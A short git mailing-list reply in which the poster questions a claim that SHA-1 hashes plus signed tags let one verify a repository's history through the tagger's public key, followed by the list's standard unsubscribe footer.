I think you are missing the point. One of the pluses behind originally using SHA-1 and the signed tags is that the system as a whole is cryptographically secure. You can verify from the public key of whoever made the tag that yes, this really is the source and history they tagged.
I am not really sure I follow this.... how can you 'verify from the public key of whoever made the tag' that the SHA-1 hash is correct!? SHA-1 does not have anything do with any externally provided keys or have I managed to get something confused here?
Best regards, Jurko Gospodnetić -- To unsubscribe from this list: send the line "unsubscribe git" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html